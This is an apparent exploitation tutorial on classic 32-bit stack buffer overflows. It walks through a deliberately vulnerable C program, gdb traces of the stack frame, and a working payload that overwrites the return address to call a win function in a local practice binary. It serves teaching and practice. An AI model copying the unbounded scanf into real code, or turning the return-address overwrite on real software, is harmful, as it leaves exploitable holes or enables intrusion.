
Smash the stack

A buffer overflow occurs when a program writes past the end of a variable, corrupting the data stored next to it. When this happens on the stack, it is called a stack buffer overflow. An overflow lets us change the value of sensitive variables adjacent to the buffer, and because the return address of a function is also stored on the stack, it lets us change the control flow of the program.

    /* stack-example.c */

    #include <stdio.h>
    #include <stdlib.h>

    void win()
    {
      printf("You Win ! ");
      exit(0);
    }

    void vuln()
    {
      char arr[0x10];           /* 16-byte buffer on the stack */
      scanf("%s",arr);          /* bug: %s has no width limit, so input can run past arr */
      printf("Input  : %s",arr);
    }

    int main()
    {
      vuln();
      return 0;
    }

Binary File : stack-example

The program above contains a buffer overflow bug. The character array is 0x10 bytes long, but scanf("%s") does not limit how much input it reads from the user, so anything beyond 0x10 bytes is written past the end of arr. With a large enough input we can overwrite the return address of vuln and make it call win().
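To make the idea concrete, here is a minimal Python sketch of an unchecked copy. It is only a toy model: the `frame` bytearray, the `NEIGHBOR` marker and the `unchecked_copy` helper are hypothetical names for illustration, not a dump of the real stack.

```python
# Toy model: a flat bytearray stands in for arr plus the data stored right
# after it. The layout is an illustration, not real process memory.
ARR_SIZE = 0x10

def unchecked_copy(memory: bytearray, offset: int, data: bytes) -> None:
    """Copy data plus a terminating NUL with no length check, like scanf("%s", arr)."""
    data = data + b"\x00"
    memory[offset:offset + len(data)] = data

# 0x10 bytes for arr, followed by 8 bytes of neighbouring data.
frame = bytearray(b"\x00" * ARR_SIZE + b"NEIGHBOR")

unchecked_copy(frame, 0, b"A" * (ARR_SIZE - 1))   # 15 bytes + NUL fits in arr
intact = bytes(frame[ARR_SIZE:])

unchecked_copy(frame, 0, b"A" * (ARR_SIZE + 3))   # 19 bytes + NUL spills over
clobbered = bytes(frame[ARR_SIZE:])

print(intact)      # b'NEIGHBOR'
print(clobbered)   # b'AAA\x00HBOR'
```

The second copy is only four bytes too long, yet it already changes the neighbouring data. In the real program the neighbours are the saved ebp and the return address.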

Note

When debugging with gdb, use the binary file provided. Compiling the code yourself may change the addresses of the functions.

    (gdb) x/10i main+11
       0x80484e7 <main+11>: mov    ebp,esp
       0x80484e9 <main+13>: push   ecx
       0x80484ea <main+14>: sub    esp,0x4
       0x80484ed <main+17>: call   0x80484ab <vuln>
       0x80484f2 <main+22>: mov    eax,0x0
       0x80484f7 <main+27>: add    esp,0x4
       ...

When the call instruction executes, the address of the next instruction, 0x80484f2, is pushed onto the stack and eip is set to 0x80484ab, the address of vuln. The return address is saved on the stack so that once vuln finishes, execution can resume at that address and the rest of main runs.

    ┌──────────────┐
    │              │
    │              │ <─ ebp 
          ...
    │              │
    │              │
    ├──────────────┤
    │  0x80484f2   │  <─esp   : value pushed by the call instruction ( return_address )
    └──────────────┘

    (gdb) x/3i 0x80484ea
       0x80484ea <main+14>: sub    esp,0x4
       0x80484ed <main+17>: call   0x80484ab <vuln>
       0x80484f2 <main+22>: mov    eax,0x0
    (gdb) b * 0x80484ed
    Breakpoint 1 at 0x80484ed

    (gdb) c
    Breakpoint 1, 0x080484ed in main ()

    (gdb) x/i $eip
    => 0x80484ed <main+17>: call   0x80484ab <vuln>

    (gdb) x/4wx $esp
    0xffffce20:     0xf7f9f3dc      0xffffce40      0x00000000      0xf7e04286

    (gdb) si
    0x080484ab in vuln ()

    (gdb) x/4wx $esp
    0xffffce1c:     0x080484f2      0xf7f9f3dc      0xffffce40      0x00000000
                       ^
                       |_ return address pushed onto the stack

    (gdb) x/i $eip
    => 0x80484ab <vuln>:    push   ebp

Let's see what happens inside the vuln function.

    80484ab:          push   ebp
    80484ac:          mov    ebp,esp

These two instructions are the function prologue. They set up a new stack frame for the function: the previous ebp is pushed onto the stack, and ebp is then set to the current value of esp.

    ┌──────────────┐
    │              │
    ├──────────────┤
    │  0x80484f2   │
    ├──────────────┤
    │ previous_ebp │ ─> ebp , esp   : Stack after the function prologue
    └──────────────┘

    (gdb) x/2i $eip
    => 0x80484ab <vuln>:    push   ebp
       0x80484ac <vuln+1>:  mov    ebp,esp

    (gdb) p/x $ebp
    $1 = 0xffffce28

    (gdb) si
    0x080484ac in vuln ()

    (gdb) x/4wx $esp
    0xffffce18:     0xffffce28      0x080484f2      0xf7f9f3dc      0xffffce40
                       ^
                       |_ ebp is pushed onto the stack

    (gdb) x/i $eip
    => 0x80484ac <vuln+1>:  mov    ebp,esp

    (gdb) si
    0x080484ae in vuln ()

    (gdb) p/x $ebp
    $2 = 0xffffce18                       /* Now ebp and esp both point to the top of the stack */

    80484ae:           sub    esp,0x18
    80484b1:           sub    esp,0x8

These instructions allocate space on the stack for the local variables (keep in mind that the stack grows from higher addresses to lower addresses).
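The register bookkeeping so far (the call, the prologue and the two sub instructions) can be replayed with a small Python model. This is a sketch under stated assumptions: the `Machine` class is hypothetical, and the starting values of esp and ebp are the ones printed in the gdb session above.

```python
# Toy model of esp/ebp bookkeeping on 32-bit x86. The Machine class is a
# hypothetical helper; register values come from the gdb session.
class Machine:
    def __init__(self, esp, ebp):
        self.esp, self.ebp, self.eip = esp, ebp, 0
        self.stack = {}              # address -> 32-bit value

    def push(self, value):
        self.esp -= 4                # the stack grows toward lower addresses
        self.stack[self.esp] = value

    def call(self, target, return_address):
        self.push(return_address)    # call saves the address of the next instruction
        self.eip = target

m = Machine(esp=0xffffce20, ebp=0xffffce28)
m.call(target=0x080484ab, return_address=0x080484f2)   # call vuln
m.push(m.ebp)                                          # push ebp
m.ebp = m.esp                                          # mov  ebp,esp
m.esp -= 0x18                                          # sub  esp,0x18
m.esp -= 0x8                                           # sub  esp,0x8

print(hex(m.ebp), hex(m.esp))   # 0xffffce18 0xffffcdf8
```

The model reproduces the addresses gdb reports: the return address lands at 0xffffce1c, the saved ebp at 0xffffce18, and 0x20 bytes are reserved below that.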

    80484b4:           lea    eax,[ebp-0x18] 
    80484b7:           push   eax           
    80484b8:           push   0x804858b
    80484bd:           call   8048370 <__isoc99_scanf@plt>

The lea instruction loads the address ebp-0x18 (the address of arr) into eax, and that address is then pushed onto the stack. If you examine address 0x804858b, you will find that it points to "%s". We are about to call scanf("%s",arr), and on 32-bit x86 function arguments are passed on the stack in reverse order, so the address of the local variable arr is pushed first, followed by the address of the "%s" string.

    ┌──────────────┐
    │              │
    ├──────────────┤
    │  0x80484f2   │
    ├──────────────┤
    │ previous_ebp │ <─ ebp
    ├──────────────┤
    │              │
          ...
    │              │
    ├──────────────┤
    │              │<─  eax   : ( ebp ─ 0x18 ) 
    ├──────────────┤  │
    │              │  │
    ├──────────────┤  │
    │  addr_arr    │──        : It is the starting address of arr array
    ├──────────────┤
    │  0x804858b   │ <─ esp   : It points to the format string 
    └──────────────┘

    (gdb) b * 0x80484bd
    Breakpoint 2 at 0x80484bd
    (gdb) c
    Continuing.

    Breakpoint 2, 0x080484bd in vuln ()

    (gdb) x/i $eip
    => 0x80484bd <vuln+18>: call   0x8048370 <__isoc99_scanf@plt>

    (gdb) x/4wx $esp
    0xffffcdf0:     0x0804858b      0xffffce00      0xf7ffcd00      0x00040000
                         ^              ^
         format string  _|              |_ address of arr array
    (gdb) x/s 0x0804858b
    0x804858b:      "%s"

When scanf is called, our input is stored on the stack. The %s conversion keeps reading until it reaches a whitespace character and performs no bounds check, so we can supply more input than the array can hold. With enough input we can overwrite the return address.
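As a rough illustration of where %s stops, here is a Python model of the conversion. It is a sketch, not the libc implementation: `scanf_percent_s` and `C_WHITESPACE` are hypothetical names, and the whitespace set assumes the default "C" locale.

```python
# Bytes that C's isspace() accepts in the default "C" locale.
C_WHITESPACE = b" \t\n\v\f\r"

def scanf_percent_s(stream: bytes) -> bytes:
    """Rough model of scanf("%s"): skip leading whitespace, then take bytes
    up to the next whitespace byte. There is no length limit."""
    start = 0
    while start < len(stream) and stream[start] in C_WHITESPACE:
        start += 1
    end = start
    while end < len(stream) and stream[end] not in C_WHITESPACE:
        end += 1
    return stream[start:end]

print(scanf_percent_s(b"  hello world\n"))          # b'hello'
print(len(scanf_percent_s(b"A" * 0x20 + b"\n")))    # 32
print(scanf_percent_s(b"AAAA\x20BBBB\n"))           # b'AAAA'
```

Two things follow for an attacker: the length of the input is never checked, and the input must not contain any whitespace byte, otherwise it is cut short at that byte. The real scanf also stores a terminating NUL after the copied bytes.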

                                           After giving 0x20 A's as input 

    ┌──────────────┐               ┌──────────────┐
    │              │               │              │
    ├──────────────┤               ├──────────────┤
    │  0x80484f2   │               │    AAAA      │
    ├──────────────┤               ├──────────────┤
    │ previous_ebp │ <─ ebp        │    AAAA      │ <─ ebp
    ├──────────────┤               ├──────────────┤         ─
    │              │               │    AAAA      │          │
          ...                           ....                 │  0x18 x "A"
    │              │               │    AAAA      │          │
    ├──────────────┤               ├──────────────┤          │
    │              │<─  eax        │    AAAA      │<─  eax  ─
    │              │  │            │              │  │
    ├──────────────┤  │            ├──────────────┤  │
    │  addr_arr    │──             │  addr_arr    │──
    ├──────────────┤               ├──────────────┤
    │  0x804858b   │ <─ esp        │  0x804858b   │ <─ esp
    └──────────────┘               └──────────────┘

The array starts at ebp-0x18, so 0x18 A's fill everything up to the saved ebp. The next 4 bytes overwrite the saved ebp, and the 4 bytes after that overwrite the return address.
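The offsets can be double-checked with a few lines of Python. The constant names are made up for this sketch. The numbers come from the lea instruction and the gdb output in this walkthrough.

```python
ARR_OFFSET_FROM_EBP = -0x18   # arr starts at ebp-0x18 (from the lea instruction)
SAVED_EBP_OFFSET = 0x0        # the saved ebp sits at [ebp]
RETURN_ADDR_OFFSET = 0x4      # the return address sits at [ebp+4]

bytes_to_saved_ebp = SAVED_EBP_OFFSET - ARR_OFFSET_FROM_EBP
bytes_to_return_addr = RETURN_ADDR_OFFSET - ARR_OFFSET_FROM_EBP

# Cross-check against the addresses gdb printed for this run.
ebp = 0xffffce18
arr = ebp + ARR_OFFSET_FROM_EBP

print(hex(arr), hex(bytes_to_saved_ebp), hex(bytes_to_return_addr))
# 0xffffce00 0x18 0x1c
```

So 0x1c bytes of padding reach the return address, and 0x20 bytes of A's overwrite it completely.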

    (gdb) x/wx $ebp+0x4
    0xffffce1c:     0x080484f2             /* return address before the overflow */
    (gdb) b * 0x80484da
    Breakpoint 5 at 0x80484da
    (gdb) c
    Continuing.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    Breakpoint 4, 0x080484da in vuln ()

    (gdb) x/4wx 0xffffce00
    0xffffce00:     0x41414141      0x41414141      0x41414141      0x41414141

Let's talk about the function epilogue.

    80484da:           leave
    80484db:           ret

The leave instruction is equivalent to:

    mov esp , ebp
    pop ebp

The mov sets esp back to the position of the saved ebp, releasing all the space allocated for the local variables, and the pop then restores the saved ebp value into the ebp register. Together they tear down the stack frame created for vuln and restore the stack frame of main before control returns to main. The ret instruction pops the value on top of the stack into eip, which on normal execution transfers control back to main.
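The effect of leave and ret on an overflowed frame can be replayed in Python. This is a toy model: the `regs` and `stack` dictionaries and the helper functions are hypothetical, while the addresses and the 0x41414141 values are taken from the gdb sessions in this walkthrough.

```python
# Stack contents after the overflow: both the saved ebp slot and the return
# address slot hold 0x41414141 ("AAAA").
stack = {0xffffce18: 0x41414141,   # saved ebp slot
         0xffffce1c: 0x41414141}   # return address slot
regs = {"esp": 0xffffce00, "ebp": 0xffffce18, "eip": 0x080484da}

def pop(regs, stack):
    value = stack[regs["esp"]]
    regs["esp"] += 4
    return value

def leave(regs, stack):
    regs["esp"] = regs["ebp"]          # mov esp,ebp
    regs["ebp"] = pop(regs, stack)     # pop ebp

def ret(regs, stack):
    regs["eip"] = pop(regs, stack)     # pop the return address into eip

leave(regs, stack)
after_leave = dict(regs)
ret(regs, stack)

print(hex(after_leave["esp"]), hex(after_leave["ebp"]))   # 0xffffce1c 0x41414141
print(hex(regs["eip"]))                                   # 0x41414141
```

Whatever value sits in the return address slot ends up in eip, which is why controlling that slot means controlling where execution continues.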

    (gdb) x/i $eip
    => 0x80484da <vuln+47>: leave
    (gdb) p/x $esp
    $6 = 0xffffce00
    (gdb) p/x $ebp
    $7 = 0xffffce18
    (gdb) si

    Breakpoint 3, 0x080484db in vuln ()
    (gdb) p/x $esp                             /* stack frame of vuln function is destroyed */
    $8 = 0xffffce1c
    (gdb) p/x $ebp
    $9 = 0x41414141

If we continue, the program will segfault because it tries to return to 0x41414141 (AAAA), which is an invalid address. If we supply a valid address instead, execution will jump there when the function epilogue runs.

    (gdb) x/i $eip
     => 0x80484db <vuln+48>: ret
    (gdb) si
    0x41414141 in ?? ()
    (gdb) p/x $eip
    $5 = 0x41414141

    (gdb) si

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()

The address of the win function is 0x0804848b.

    (gdb) x/i win
       0x804848b <win>: push   ebp

So let's write the exploit. We need 0x1c bytes of junk (0x18 to fill the space from arr up to the saved ebp, plus 4 to overwrite the saved ebp), followed by the address of win, so that the return address is overwritten with the address of win(). x86 stores data in little-endian order, so the bytes of the address must be given in reverse order. We will use Python to generate the crafted input that triggers the bug and calls win. Note that the one-liner uses Python 2 print syntax.

    (gdb) ! python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"'  > input       # the output is saved to the file input
    (gdb) r < input
    Starting program: stack_example < input

    Breakpoint 3, 0x080484da in vuln ()
    (gdb) x/wx $ebp+0x4
    0xffffce1c:     0x0804848b
    (gdb) x/2i 0x0804848b
       0x804848b <win>:     push   ebp
       0x804848c <win+1>:   mov    ebp,esp
    (gdb) c
    Continuing.
    Input  : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win ! [Inferior 1 (process 32330) exited normally]

Let's run it outside gdb.

    python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"' | ./stack_example

    Input  : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win !

We have successfully changed the control flow of the program.
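The one-liners above rely on Python 2, where print emits raw bytes. Under Python 3 the same payload could be built roughly as follows. This is a sketch, not the author's script: `build_payload` and `emit` are hypothetical helper names, and the address is only valid for the provided binary.

```python
import io
import struct

WIN_ADDR = 0x0804848b      # address of win, from `x/i win` on the provided binary
OFFSET_TO_RET = 0x1c       # 0x18 bytes up to the saved ebp + 4 bytes of saved ebp

def build_payload(target: int, offset: int = OFFSET_TO_RET) -> bytes:
    # "<I" packs an unsigned 32-bit integer in little-endian byte order.
    payload = b"A" * offset + struct.pack("<I", target)
    # scanf("%s") stops at whitespace, so the payload must not contain any.
    if any(byte in b" \t\n\v\f\r" for byte in payload):
        raise ValueError("payload contains a whitespace byte")
    return payload

def emit(out) -> None:
    """Write the payload and a newline to a binary stream as raw bytes."""
    out.write(build_payload(WIN_ADDR) + b"\n")

payload = build_payload(WIN_ADDR)
print(payload.hex())

# Demonstrate emit() on an in-memory binary stream.
buffer = io.BytesIO()
emit(buffer)
```

To feed the program, call `emit(sys.stdout.buffer)` (after `import sys`) instead of using print, since print would re-encode bytes above 0x7f such as 0x8b, and pipe the script's output into the binary the same way as the one-liner.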

Practice Challenges